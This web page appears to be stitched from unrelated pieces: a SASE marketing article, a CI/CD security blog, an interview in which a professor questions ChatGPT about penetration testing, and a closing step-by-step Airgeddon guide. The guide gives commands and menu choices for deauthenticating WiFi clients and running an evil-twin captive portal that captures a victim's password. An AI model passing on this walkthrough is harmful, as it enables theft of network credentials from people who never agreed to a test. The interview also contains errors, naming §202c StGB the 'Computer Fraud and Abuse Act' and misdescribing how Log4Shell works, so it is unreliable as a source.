SASE eliminates the difficulties of managing a complex network and its associated costs. Unlike traditional point solutions, SASE is a single cloud-based solution that offers easy management. In traditional networks, managing multiple devices such as NGFW, VPN, SWG, and SD-WAN in different office locations requires a large IT staff. As the number of offices increases, so does the need for additional personnel.

  • Complete SD-WAN Integration

The adoption of Software-Defined Wide Area Network (SD-WAN) technology has revolutionized the way businesses connect to the cloud. With SASE, businesses can move away from traditional, proprietary WAN solutions and benefit from lower operational costs, increased flexibility, and improved performance. SD-WAN optimizes traffic flow by utilizing a centralized control plane, resulting in better application performance, reduced IT budgets, increased productivity, and a better user experience. Pairing SD-WAN with separately managed security appliances, however, fragments control; SASE eliminates this problem by providing a single cloud-based solution that centralizes control and protection of the entire network, simplifying management and reducing the need for a large IT staff.

  • Stable Data Protection for Your Business

Every day, businesses handle a large amount of important data, including sensitive customer information and confidential business data. Protecting this information is critical to avoiding data loss or exposure to malicious actors. The use of a SASE framework offers a solution to this challenge, with built-in automatic cloud data loss prevention (DLP). The SASE framework integrates DLP into key control points, ensuring that all forms of data are secure and protected. This eliminates the need for multiple protection tools, as the SASE DLP covers various cloud environments, devices, and applications.

SASE DLP provides businesses with the ability to enforce protection policies across their entire network, from a single central point. It also authenticates devices and users before granting access to the business applications and data, further enhancing the security of the network.

  • Enhanced Network Performance

With the integration of SASE, businesses can experience improved network performance. The solution constantly tracks and monitors the flow of data, giving businesses a comprehensive view of how their data is being distributed across different data centers and cloud environments.

By monitoring both inbound and outbound processes, businesses can receive real-time information from a single network interface or portal. This eliminates the latency issues that were previously experienced with traditional network monitoring methods.

With SASE, businesses can enjoy fast and reliable network connections, regardless of the remote location of the portal user. This enhances the overall user experience and improves the efficiency of remote data access.

How to choose partners for SASE?

Choosing the right partner for your SASE solution is a crucial step in ensuring the security and efficiency of your cloud-based business processes. To ensure you make the right choice, here are some factors you should consider:

  • Integrability

Ensure that the SASE solution offered by the potential partner is compatible with the cloud computing platform you use. For example, if you use Microsoft Azure, your SASE must be functional with it.

  • Previous work

Ask the vendor to provide case studies from previous projects and consider reaching out to firms that have worked with them to gain insights into their partnership capabilities.

  • International credentials and certificates

Check for certifications such as ISO 27001, 27002, and HIPAA to verify the partner's ability to handle sensitive data securely.

  • Price

Compare prices offered by different vendors and make a decision based on your budget and needs.

  • Customer support model

Evaluate the provider's customer service policies, as different providers have different approaches. Consider the level of support you need based on your organization's IT capabilities.

Why SASE Is the Future of Remote Access?

The traditional networking model has been around for a while now, with applications and data residing in a central data center. This central location serves as the hub for users, workstations, and applications to access company resources, which is usually achieved through a local private network or a secondary network connected to the primary network through a VPN or other secure line. However, with the evolution of technology, this traditional approach has become increasingly insufficient in meeting the demands of a cloud-forward system that operates with a distributed workforce and utilizes SaaS services. It is no longer practical to direct all network traffic through a corporate data center when data and applications are hosted in a distributed cloud environment.

SASE (Secure Access Service Edge) offers a solution to this problem by implementing network controls at the cloud edge, instead of a unified data center. This approach streamlines security and network services, providing a more secure network edge without the need for a layered stack of cloud services with separate management and configuration requirements. Organizations can take advantage of SASE by implementing identity-based zero-trust access policies at the network edge. This expands the network's security perimeter to cover remote users, offices, devices, and applications, enhancing overall security. In conclusion, SASE is the future of remote access, providing organizations with a secure, flexible, and efficient solution to meet the demands of a rapidly changing technological landscape.

The implementation of SASE (Secure Access Service Edge) brings with it numerous benefits that make it a valuable solution for organizations looking to improve their network security. Some of these benefits include:

  • Improved Performance: Service and application performance are optimized through a routing mechanism that minimizes latency and directs traffic through a high-performance SASE backbone. This is particularly important for latency-sensitive applications such as video and VoIP.
  • Streamlining Access: SASE architectures provide consistent, secure, and fast access to all resources from any physical location, unlike data center-based access models, which can be slow and unreliable.
  • Cost Optimization: The cloud model used by SASE is cost-efficient, allowing organizations to spread their costs across monthly fees, instead of making an upfront capital investment. It also allows businesses to consolidate their vendors and reduce the number of virtual and physical appliances and their associated costs, including purchasing and maintenance costs. Additionally, delegating the responsibilities of upgrades and maintenance to the SASE provider reduces costs even further.
  • Simplifying the System: SASE's cloud-based security model and single-vendor WAN functions simplify the system compared to traditional multi-vendor approaches, which utilize different security appliances across different locations. The single-pass traffic inspection architecture of SASE helps to simplify the system further by decrypting and inspecting traffic streams in a single pass using different policy engines, instead of combining different inspection services.
  • Enhanced Usability: SASE often reduces the number of agents and applications required by a device, replacing them with a single, user-friendly application. This ensures a consistent user experience regardless of the user's location or the resource being accessed.

Conclusion

In conclusion, SASE is a promising solution that provides organizations with the benefits of simplified systems, streamlined access, cost optimization, improved performance, and enhanced usability. The implementation of SASE requires careful planning and a clear understanding of an organization's current network security architecture, but the result is a more secure and efficient network. The future of cloud security is closely tied to SASE, which will continue to play an important role in protecting organizations from threats and helping them manage their network security needs. As the demand for cloud-based services continues to grow, organizations must take steps to adopt SASE and stay ahead of the curve in terms of network security.


CI/CD falls under the umbrella of DevOps and is formed by combining the practices of continuous integration and continuous delivery. The main purpose of CI/CD is to automate the manual intervention that used to be a prerequisite for shipping new code.

With a CI/CD pipeline, developers can have their code changes automatically built, tested, and pushed out for delivery and deployment. CI/CD helps you minimize downtime and release code more quickly. Here we will cover the top CI/CD security best practices that get the job done without the encumbrance of manual work.

What is Continuous Integration?

Continuous integration (CI) is the process of integrating all the code changes you make into the main branch of a shared source code repository, automatically testing every change you commit. By implementing continuous integration, you can instantly catch errors and security issues and fix them while they are still simple to resolve.

Changes are merged frequently, which triggers automated testing and validation of the code and minimizes code conflicts, even when a group of developers is working on the same application.

Common code validation starts with static code analysis, which verifies the quality of the code. As soon as the code passes that check, CI automatically compiles it for the upcoming automated tests.

What is Continuous Delivery?

Continuous delivery (CD) is a software development practice that works with continuous integration to automate infrastructure provisioning and app release procedures.

Soon after the code is tested and built as part of the CI process, continuous delivery takes over during the final stages to ensure it can be deployed smoothly to any environment at any time.

With continuous delivery, software is built so that it can be deployed to production at any suitable time, and you have the flexibility to trigger deployments automatically or manually.

Let's take a look at the market overview of DevSecOps:

  • DevSecOps market size and forecast: the DevSecOps market was valued at USD 3.73 billion in 2021 and is expected to reach USD 41.66 billion by 2030, growing at a CAGR of 30.76% from 2022 to 2030.
  • As per a recent report by KBV Research, the global DevOps market will reach $88 million by 2023, growing at a compound annual rate of 18%, which far outpaces the growth of the international IT market. Additionally, according to Forrester Research, 50% of organizations have adopted DevOps, reaching what Forrester calls "Escape Velocity."
  • The overview of this CI/CD report suggests that 47% of developers use continuous integration or deployment in some way.
  • 96% of CTOs have mentioned their business would benefit from automating security and compliance processes, a key principle of DevSecOps.

Is Using CI/CD Actually Important?

CI/CD pipelines are critical infrastructure, and they handle confidential details of applications and their underlying systems. This means that anyone who gains unauthorized access to your CI/CD pipeline effectively has unlimited power to breach your entire infrastructure or deploy malicious code.

This is the key reason CI/CD pipeline security and DevOps security matter, and why adopting best practices for securing CI/CD pipelines is a prerequisite.

6 Best CI/CD Pipeline Practices to Follow for Optimum Security

So, here we begin with the most important segment of our blog, which is the guide to follow the best practices for optimal security in CI/CD pipeline:

1. Analyze The Key Factors That Can Cause a Threat To a Secure Connection

Initially, you need to understand the factors and vulnerable points where the chances of a security threat are comparatively higher. It is good practice to examine which parts of the deployment process require an additional layer of security.

That does not mean the remaining factors are trivial: any connection to the CI/CD pipeline could be a major point of compromise, so each and every connection should be made over Transport Layer Security (TLS), as in the sketch below.
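As an illustration, a pipeline script fetching an external resource should verify TLS certificates instead of disabling verification for convenience. A minimal Python sketch, with a hypothetical artifact URL:

import requests

# verify=True (the default) enforces certificate validation; never pass
# verify=False in pipeline code just to silence certificate errors.
resp = requests.get("https://artifacts.example.com/release.tar.gz", timeout=30, verify=True)
resp.raise_for_status()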

2. Don't Let the Test Environments stay Wide Open

Mind you, this is one of the biggest blunders you can commit! Teams typically deploy multiple test environments for a product and leave them wide open to developers for manual testing. These environments are rarely hardened with the robust security applied to staging or production environments.

The crux is that they are fully functional environments, which means an attacker who gains access to one can use it as a stepping stone to other places in your infrastructure. Hence, it is crucial to make your test environments as secure as your other environments.

3. Never Unlock Your Confidential Stuff; Keep Your Secretive Stuff Safe

By secrets we mean authentication credentials such as usernames and passwords, API tokens, SSH keys, and encryption keys; these are the keys that grant access to applications and services.

They are the biggest unlocking element for a project's data and resources. If they are not robustly protected, they can be very useful to hackers for breaching data and stealing intellectual property.

You need to control where secrets are stored and who has access to them with a rigorous key management service, which encrypts, stores, and injects secrets at runtime, only when they are actually needed. That way, they are not disclosed when an application is built or deployed, nor do they appear in the source code.

Even if you use a key management tool, it is still good practice to monitor and audit code repositories to catch and remove confidential elements that have been committed to the code base. You can also use tools that prevent such code from being pushed or passed on in pull requests.

Software engineers should never write code that prints a secret to the console log, not even while testing. Some CI/CD and DevOps tools can mask secrets if they are printed or output in any way, such as to the console or debug logs; a minimal sketch of both habits follows.
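A minimal Python sketch of both habits, assuming the CI runner injects the secret as an environment variable named API_TOKEN (a hypothetical name):

import os
import sys

def get_secret(name):
    # Fetch the secret from the environment at runtime; never hardcode it.
    value = os.environ.get(name)
    if value is None:
        sys.exit("Missing required secret: " + name)
    return value

def masked(value):
    # Redact the secret before it can reach the console or debug logs.
    return value[:2] + "*" * (len(value) - 2) if len(value) > 4 else "****"

api_token = get_secret("API_TOKEN")
print("Using API token " + masked(api_token))  # log only the masked form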

4. Meticulously Operate And Clean Up

A continuous software delivery pipeline is, by definition, a flow of constantly moving parts and processes for builds and deployments, but don't let that cadence distract you from proper security maintenance chores.

Always monitor the CI/CD environment as it runs, and eliminate temporary resources, such as containers and VMs, after you are done with your tasks. To reduce the attack surface of containers and VMs, remove unnecessary tools and utilities.

5. Keep Yourself Aware And Always Have A Backup Plan

A CI/CD pipeline can pull in third-party resources and services at any point. IT teams must diligently monitor the security feeds and notices of the vendors whose products and services they use, so they can immediately discover and act on breaking news. You should also maintain an incident response plan to manage such an event and curtail any impact on the pipeline.

For instance, in response to the Codecov breach, high-profile users such as Netflix and the Vim text editor project immediately rotated their credentials as a security precaution.

HashiCorp rotated one of its GNU Privacy Guard keys, which was used for release signing and verification. Whenever you add new tools or services to the CI/CD pipeline, update the incident response plan at the same time.

When it comes to security, CI/CD pipelines are core to many organizations' products and services, so you should consider them as important as any other business-critical operation. Secure them accordingly to impede supply chain attacks and other security failures that would adversely affect the build and delivery processes.

Segment them from the rest of the enterprise network and monitor them regularly to make sure your CI/CD pipeline is free of suspicious or inappropriate activity.

There are innumerable interconnected services and components, many of them supplied or controlled by third parties, so there is no set-and-forget approach to pipeline security.

6. Keep Your CI/CD Tool Up to Date

Updating your CI/CD tool is often treated as a secondary priority, but it is not something you can afford to postpone: an out-of-date tool may carry known bugs and vulnerabilities.

If you don't keep your CI/CD tool updated, you risk a data breach, and the aforementioned best practices will all be in vain. It is always a primary best practice to implement good access management, because leaving your CI/CD tool on a vulnerable version practically invites an attacker to simply bypass authentication.

Concluding Statement

Now that we have reached the end of this blog, we expect you to take care of your CI/CD pipeline in the best possible way. Bear in mind that it is the main door to all your valuable data, and neglecting it could ruin all the effort you have put into your organization up to now.

Treating this process flippantly is not a good idea; you now have a clear picture of the consequences you would face. We hope this guide helps you further with these concepts.

Author Bio

Mehul Rajput is the CEO of MindInventory, a software development company that provides web and mobile app solutions from startup to enterprise-level company. His role involves heading the operations related to business and delivery with strategic planning and defining the roadmap for the future.

by prof. Volker Skwarek, cybertalk.podcast@pm.me

In this interview, ChatGPT is challenged with the general subject of penetration testing. I wanted to know more about ChatGPT’s knowledge about pentesting and how far it would guide me with precise procedures for testing. Last but not least, I also wanted to know a little more about ChatGPT.

The answers were surprisingly good, even if they were not entirely satisfying.

This text is a cut version of the full interview, as indicated by the ellipses […]. The full interview can be downloaded from the author's podcast cast-notes site, provided at the end of this article.

While preparing for my interview with ChatGPT I was a bit nervous: Will it provide sufficient answers? How deep can I ask for technical details? Will it understand me and my questions? 

For better and more personal communication, I decided to ask ChatGPT if it minds being called Rachael – in memory of the android in the movie "Blade Runner". ChatGPT agreed. Therefore, I gave her the long name RachaelChatGPT, to be read as Rachael – powered by ChatGPT.

I wanted to digress only a little in the interview, so I followed a strict guideline. However, I still had my own thoughts during the interview, which are printed in upright, non-bold letters.

[…]

Volker: Okay. Thank you. Let's now get into technical details. Today we are meeting to talk about pentesting. What do you know about it?

Rachael: Penetration testing, also known as pen testing, is a security testing method that involves assessing the security of computer systems, networks, or applications by simulating an attack from a malicious actor. The purpose of penetration testing is to identify vulnerabilities that can be exploited by attackers and to provide recommendations for mitigating those vulnerabilities.

Penetration testing can be performed using a variety of techniques, including network scanning and enumeration, vulnerability scanning, password cracking, social engineering, and exploitation of software vulnerabilities. The process typically involves several stages, including planning, reconnaissance, discovery, vulnerability assessment, exploitation, and reporting.

Penetration testing is an important component of a comprehensive security program, as it can help organizations identify and address vulnerabilities before they can be exploited by attackers. It can also help organizations comply with security regulations and standards, such as the Payment Card Industry Data Security Standard (PCI DSS) and the Health Insurance Portability and Accountability Act (HIPAA).

Volker: Do you also know any details of specific pentesting procedures?

Rachael: Yes, I can provide some details on specific penetration testing procedures. Here are a few common types of penetration testing:

  • Network Penetration Testing: This type of testing involves assessing the security of an organization's network infrastructure, including servers, routers, switches, firewalls, and other network devices. The goal is to identify vulnerabilities in the network that could be exploited by attackers to gain unauthorized access or steal sensitive data.
  • Web Application Penetration Testing: This type of testing involves assessing the security of an organization's web applications, such as e-commerce sites, online banking portals, and other web-based systems. The goal is to identify vulnerabilities in the application that could be exploited by attackers to gain unauthorized access or steal sensitive data.

[…]

These are just a few examples of the types of penetration testing procedures that are commonly used. Each procedure is tailored to the specific needs and goals of the organization being tested.

Volker: Thank you. But these are no actual details. Honestly: This is pretty superficial! These are only keywords but no procedures. Do you know more in detail?

Rachael: I apologize for the earlier response. Here are more details on each of the pentesting procedures I mentioned:

  • Network Penetration Testing:
  • Reconnaissance: This stage involves gathering information about the target network, including IP addresses, network topology, and services running on the network.
  • Vulnerability Assessment: This stage involves scanning the network for vulnerabilities and weaknesses, including misconfigured systems and outdated software.
  • Exploitation: This stage involves attempting to exploit identified vulnerabilities to gain access to the network, such as attempting to gain administrative access to a server or using a remote code execution vulnerability to execute malicious code on a system.
  • Reporting: This stage involves documenting all findings, including identified vulnerabilities, recommended remediation steps, and risk ratings.

[…]

Here I interrupted Rachael because of her repeatedly superficial answers. Her responses are extensive and match the intention of my questions. Nevertheless, they are only as good as those of a well-educated Cybersecurity 101 student who has learned the terms of the subject by heart. The repeated structure of her answers, echoing the questions back, is tedious and tiring, and Rachael does not even tend to become more precise.

[…]

Volker: Okay. Let's take another approach: What primary attack would you use for network testing?

Rachael: As an AI language model, I don't have the ability to perform any actual penetration testing, nor do I condone or encourage any illegal or unethical activities. However, to answer your question, network penetration testing can involve a wide range of attacks, depending on the specific vulnerabilities identified in the target network. Some examples of primary attacks used in network penetration testing include:

  • Port Scanning: An attacker scans the target network for open ports, which can be used to identify services running on specific hosts and potentially find vulnerable systems.
  • Network Sniffing: An attacker can use a network sniffer to capture network traffic and analyze it for sensitive information, such as usernames and passwords.
  • Denial-of-Service (DoS) Attacks: An attacker can use a DoS attack to flood a target network with traffic and disrupt its availability.

[…]

It's important to note that these attacks should only be performed with explicit permission from the network owner and with the goal of identifying and addressing vulnerabilities, rather than causing harm or damage to the network.

Volker: Interesting. I want to know more about port scanning. What tools can I use?

Rachael: There are several tools available for port scanning in network penetration testing. Here are a few examples:

  • Nmap: Nmap is a popular open-source tool that can be used for network exploration and port scanning. It has a wide range of features and options, including host discovery, version detection, and OS fingerprinting.

[…]

Volker: I have already heard about nmap. Seems to be a quite popular tool. Can I also determine targeted systems' operating system or software version?

Rachael: Yes, Nmap can be used to detect the operating system and software versions running on the target systems, in addition to identifying open ports and services. This is achieved through a technique called OS fingerprinting and service/version detection.

OS fingerprinting is the process of analyzing network traffic patterns and characteristics to identify the operating system running on a particular host. 

[…]

Volker: What is the full syntax of the command when I want to use nmap for OS fingerprinting?

Rachael: The full syntax for using Nmap for OS fingerprinting is:

nmap -O <target>

In this command, "nmap" is the name of the tool, "-O" is the option for performing OS fingerprinting, and "<target>" is the IP address or hostname of the target system or network.

You can also specify a range of IP addresses or a CIDR notation for scanning multiple hosts, and use other options and arguments to customize the scan, such as specifying a different port range, using different timing and performance options, and outputting the results in various formats.

It's important to note that OS fingerprinting can be a sensitive activity and can potentially be detected by intrusion detection systems (IDS) or other security tools. Therefore, it's important to perform OS fingerprinting only with explicit permission and within the scope of a legitimate penetration testing engagement.

Volker: Regarding German legislation: Is it just illegitimate to perform network scanning without permission, or is it already considered an attempted crime?

Rachael: In Germany, performing network scanning or penetration testing without explicit permission from the owner or administrator of the target network is generally considered illegal under the Computer Fraud and Abuse Act (§202c StGB). This is because such activities can potentially disrupt or damage the target network, and can also violate the privacy and confidentiality of the target's data and systems.

Under the law, unauthorized network scanning can be considered a criminal offense, with penalties ranging from fines to imprisonment depending on the severity and consequences of the offense. However, the specific legal implications and penalties can vary depending on the circumstances of the case, such as the intent of the attacker, the scale and impact of the attack, and the level of damage or harm caused to the target network.

It's important to note that performing network scanning or penetration testing without explicit permission is also considered unethical and unprofessional, and can damage the reputation and credibility of the security industry as a whole. Therefore, it's always recommended to obtain explicit permission and conduct all testing and scanning activities within the scope of a legitimate and authorized penetration testing engagement.

This set of answers was really impressively exhaustive. Although I wonder if all the mentioned network scanning tools are essential in daily use, at least the most important was listed first. Additionally, I was impressed by the detailed response to my syntax question on nmap.

It is also good that Rachael indicates the legal and ethical implications of network scanning. She is also aware of the fact – again, the human-minded term “aware of”, better: programmed for – that activities have moral and legal limitations. And the answer on German legislation is perfectly right: unauthorized network scanning is a crime as I may obtain private and security-relevant information not intended for me.

Let me now check if she is similarly “intelligent” in other areas of pentesting.

Volker: Thank you for your extensive answer. Do you mind if I change the topic to web penetration testing?

Rachael: Sure, I'd be happy to discuss web penetration testing with you. What specific aspects of web pen testing are you interested in?

Volker: What is the state-of-the-art for knowing about vulnerabilities and testing or security procedures of web security?

Rachael: The state-of-the-art for web penetration testing and security procedures involves a combination of automated tools and manual techniques, along with continuous monitoring and proactive security measures. Here are some of the key aspects of web security testing and best practices:

  • Vulnerability scanning: Automated tools such as web application scanners can help identify vulnerabilities in web applications and APIs, including cross-site scripting (XSS), SQL injection, and file inclusion vulnerabilities. These tools can also detect misconfigured servers and insecure coding practices.
  • Manual testing: While automated tools can be helpful in identifying common vulnerabilities, manual testing is necessary to identify more complex vulnerabilities and logic flaws. This can include testing for business logic errors, authentication and authorization flaws, and server-side vulnerabilities.

[…]

Overall, the state-of-the-art for web penetration testing and security involves a comprehensive and multi-faceted approach that combines automated tools, manual testing, and ongoing monitoring and remediation. By implementing these best practices, organizations can improve the security of their web applications and systems and reduce the risk of cyber attacks and data breaches.

Volker: Do you know an organization fully dedicated to finding, listing and resolving web vulnerabilities?

Rachael: Yes, there are several organizations that are dedicated to finding, listing, and resolving web vulnerabilities. Here are a few examples:

  • OWASP: The Open Web Application Security Project (OWASP) is a non-profit organization that focuses on improving the security of software and web applications. OWASP provides a wide range of resources for developers and security professionals, including the OWASP Top Ten list of web application vulnerabilities.

[…]

Volker: Do you know about CVE-2021-44228 and how to exploit it?

Rachael: CVE-2021-44228, also known as Log4Shell, is a critical vulnerability in the Apache Log4j logging library that was discovered in December 2021. The vulnerability allows remote attackers to execute arbitrary code on affected systems by sending specially crafted requests to a vulnerable server.

The exploit for CVE-2021-44228 is publicly available and has been used in real-world attacks. The exploit involves sending a malicious request to a vulnerable server that includes a specially crafted Log4j configuration file. When the server processes the request, it loads the configuration file and executes the attacker's code.

[…]

This set of answers is again structured like the one about network scanning: a general question gets a response at the same generalized level. The answer contains perfectly correct elements, such as OWASP as an organization fully dedicated to web application security, but it also has less precise and nearly, or even thoroughly, wrong parts.

[…]

Asking Rachael about log4j delivered a surprisingly good answer. A detailed procedure or a reference to a proof of concept is not delivered concerning potential illegal activities. This is actually true but could also be an apologetic argument for missing knowledge.

I am surprised in every respect by this interview with Rachael: first of all, it was perfectly readable and understandable. The answers were related to the questions, and the knowledge was about average. Rachael even showed some human traits, although she repeatedly mentioned that she is only an algorithm-based AI. The quality of the answer fundamentally depends on the quality of the question: the more precise the question, the deeper the answer.

Only some responses were perfectly correct, but at least no answer could be considered totally wrong. Furthermore, an ethical and legal filter seems to be implemented so that Rachael does not support criminal actions.

It is a relief to note that Rachael probably cannot replace human intelligence (yet). You already have to have deep knowledge of a matter to ask her the precise questions that yield equally exact answers. A simple "what do you know about" or "tell me a way to" ends in a similarly shallow response.

I am sure that Rachael and I will have follow-up meetings in the (internet) café next door and discuss further topics of pentesting, ethics and other noteworthy problems of the world.

The author of this interview is Volker Skwarek. He is professor of computer science specialized in cyber security at Hamburg University of Applied Sciences in Germany.

Airgeddon is a popular, free, and open-source wireless security auditing tool that helps penetration testers locate and exploit vulnerabilities in wireless networks. It is available for download from GitHub. Airgeddon runs on Kali Linux and other Debian-based distributions.

To use Airgeddon, first ensure that your wireless card is compatible. Next, identify the target wireless network and select the appropriate attack mode. Then, launch the attack and wait for Airgeddon to crack the password. Finally, extract the password from the handshake file.

Airgeddon is a powerful tool that can be used to easily find and exploit vulnerabilities in wireless networks. However, it is important to use it responsibly and only on networks that you have permission to test.

In today's educational guide, we will see how to hack, or "break", WiFi passwords in a few simple steps.

In this article, we will see how to break WiFi passwords so that you can understand the risk your personal data runs when no protection measures are taken. The techniques described are for purely educational purposes and were performed on my personal WiFi network.

What we need to start WiFi hacking

  • Kali Linux
  • a WiFi adapter that supports monitor mode
  • Airgeddon

Indicative WiFi adapter chipsets that support monitor mode are:

  • Atheros AR9271
  • Ralink RT3070
  • Ralink RT3572
  • Realtek 8187L
  • Realtek RTL8812AU (2017)
  • Ralink RT5370N

In this guide, I use the latest version of Kali Linux and the Airgeddon program to attack my own WiFi network. The reason I chose this program is that it can be used by novice users and it covers all WiFi hacking techniques. So let's get started.

How do I crack the WiFi password?

So let's start by opening a terminal in Kali, while physically connected to our home WiFi, and download Airgeddon:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

After downloading the program, we enter its folder:

cd airgeddon
sudo bash ./airgeddon.sh


  • Step 1: After it starts, we press Enter to search for some necessary and optional tools; if they are not present in our system, the program will install them. When finished press Enter.
  • Step 2: In the Interface option prompt, select 2, i.e., wlan0 as we are hacking WiFi and press Enter.
  • Step 3: On the next screen, choose option (2) to put the WiFi in monitor mode and press Enter.
  • Step 4: As we are attacking with a rogue access point, we must select the Evil Twin attacks menu, i.e., option (7), and then press Enter.

  • Step 5: After selecting the Evil Twins Attack menu, several options will appear. We use Evil Twin attack with Captive portal, i.e., option (9) which requires monitor mode.
  • Step 6: After pressing Enter, a list of nearby WiFi networks appears; we stop the scan with Ctrl+C and select the target network.

  • Step 7: After selecting the network, we select the Deauth aireplay attack, i.e., option (3), which is a deauthentication attack. We don't need DoS pursuit mode, so we press "n", and we don't need internet access mode, so we press "n" again.
  • Step 8: To the MAC spoofing question, press "n". This attack requires a previously recorded handshake file from the WPA/WPA2 network. As I am performing this attack on this network for the first time, there is no handshake file on my machine, so I pressed "n". If you have a recorded handshake file, press "y" and specify the path where you saved it.
  • Step 9: In this step, airgeddon causes all clients connected to my network to disconnect, and when the clients reconnect to the network, the WiFi adapter records the handshake file that has all the necessary information (in encrypted form), such as the WiFi network password we need.
  • Step 10: After recording the Handshake file, it asks for a path to save it, we press Enter to save it to its required path with the required name.
  • Step 11: Now it asks for the captive portal language (the login page, which is fake in our case). Choose a language that leaves the victim in no doubt. I personally chose Greek.

  • Step 12: With the fake captive portal carrying the same WiFi network name, several windows open where we can observe the clients that connect to our fake network while being constantly disconnected from the original WiFi.

When the victim is forced through the captive portal login, they have to enter their WiFi password. We can observe the victim's password in the control window opened in Step 12. If the victim enters a wrong password, the portal tells them the password was incorrect.

How does it work? It works because we captured a handshake of the original network, which contains material cryptographically derived from the password. The script checks the password the victim enters in the fake WiFi login portal against the captured handshake; a sketch of the underlying check follows below.
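The core of that check is standard WPA/WPA2 key derivation. A minimal Python sketch of the first step (the SSID and candidate password are hypothetical); a real tool such as aircrack-ng then derives the PTK from this PMK plus the nonces and MAC addresses in the handshake and compares the resulting MIC with the captured one:

import hashlib

ssid = b"MyHomeWiFi"            # hypothetical network name
candidate = b"SuperSecret123"   # password entered on the fake portal

# WPA/WPA2: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
pmk = hashlib.pbkdf2_hmac("sha1", candidate, ssid, 4096, 32)
print(pmk.hex())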

If the victim enters the correct password, the check succeeds and the password is confirmed.

After we have successfully recorded the password, it is saved as a text file on the machine and the control window closes automatically. Finally, the interface is restored from monitor mode and airgeddon closes.

So, in this way, a hacker can hack a WiFi network and find the WiFi password very easily, and in less than five minutes.